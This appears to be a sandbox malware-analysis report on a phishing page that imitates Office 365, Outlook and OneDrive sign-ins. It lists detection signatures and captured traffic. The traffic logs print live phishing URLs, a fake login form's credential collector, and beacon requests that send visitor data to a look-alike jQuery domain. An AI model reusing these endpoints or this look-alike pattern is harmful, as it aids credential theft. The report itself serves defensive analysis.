Edit tour

Windows Analysis Report
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data

Overview

General Information

Sample URL:	https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data
Analysis ID:	1594752
Infos:

Detection

HTMLPhisher

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Misleading page title found

Yara detected HtmlPhish10

Yara detected HtmlPhish7

Phishing site or detected (based on various text indicators)

HTML body contains low number of good links

HTML title does not match URL

Invalid 'forgot password' link found

Suspicious form URL found

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1952,i,13083635403947350508,6070381343288843226,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
2.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.0.pages.csv	JoeSecurity_HtmlPhish_7	Yara detected HtmlPhish_7	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data

Avira URL Cloud: detection malicious, Label: phishing

Antivirus detection for URL or domain

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/outlook.png	Avira URL Cloud: Label: phishing
Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/office.png	Avira URL Cloud: Label: phishing
Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/mail.png	Avira URL Cloud: Label: phishing
Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/assets/ms-bg.jpg	Avira URL Cloud: Label: phishing
Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/bg.png	Avira URL Cloud: Label: phishing
Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/oneDrive.png	Avira URL Cloud: Label: phishing
Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/img/out.png	Avira URL Cloud: Label: phishing

Phishing

AI detected phishing page

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php

Joe Sandbox AI: Score: 9 Reasons: The brand 'Outlook' is well-known and is associated with Microsoft., The legitimate domain for Outlook is 'outlook.com'., The provided URL 'grtt.vantechdns.com' does not match the legitimate domain for Outlook., The domain 'vantechdns.com' does not have any known association with Microsoft or Outlook., The presence of input fields for email and password recovery is typical for phishing sites attempting to capture user credentials., The URL contains a subdomain 'grtt' which is not related to Outlook, increasing suspicion. DOM: 2.1.pages.csv

Misleading page title found

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php	Page Title: Office 365 - Login
Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php	Page Title: Office 365 - Login

Yara detected HtmlPhish10

Source: Yara match

File source: 2.1.pages.csv, type: HTML

Yara detected HtmlPhish7

Source: Yara match

File source: 1.0.pages.csv, type: HTML

Phishing site or detected (based on various text indicators)

Source: Chrome DOM: 1.0

OCR Text: Search everything OneDrive Onedrive Online Limits across different plans. Sign in to Continue to OneDrive Online. Sign in with Outlook Sign in with Office 365 O Sign in with Other Mail Get all your files frorn anywhere on any device, and share them with anyone. OneDrive your shared document in one cloud. Go premium

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php

HTTP Parser: Number of links: 0

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php

HTTP Parser: Title: Office 365 - Login does not match URL

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php

HTTP Parser: Invalid link: I forgot my password !

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php

HTTP Parser: Form action: http://localhost/ali/new/php/login365.php

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php

HTTP Parser: <input type="password" .../> found

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php

HTTP Parser: No <meta name="author".. found

Source: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php

HTTP Parser: No <meta name="copyright".. found

Source: unknown

HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49708 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data HTTP/1.1Host: grtt.vantechdns.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/ HTTP/1.1Host: grtt.vantechdns.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/oneDrive.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/bg.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/outlook.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/office.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/mail.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/oneDrive.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/outlook.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/office.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/bg.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/mail.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/out.php HTTP/1.1Host: grtt.vantechdns.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.5.1.min.js HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/out.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/assets/ms-bg.jpg HTTP/1.1Host: grtt.vantechdns.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip.php HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bnnnnnnnnii99/new_87392/data/img/out.png HTTP/1.1Host: grtt.vantechdns.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.5.1.min.js HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip.php HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /post/index.php?title=Office%20365%20-%20Login&link=https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php&time=2025-1-19%2018:19:38&ip=8.46.123.189%20:%20United%20States HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /post/index.php?title=Office%20365%20-%20Login&link=https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php&time=2025-1-19%2018:19:38&ip=8.46.123.189%20:%20United%20States HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: /sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://grtt.vantechdns.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://grtt.vantechdns.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1Host: code.jquery.com.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
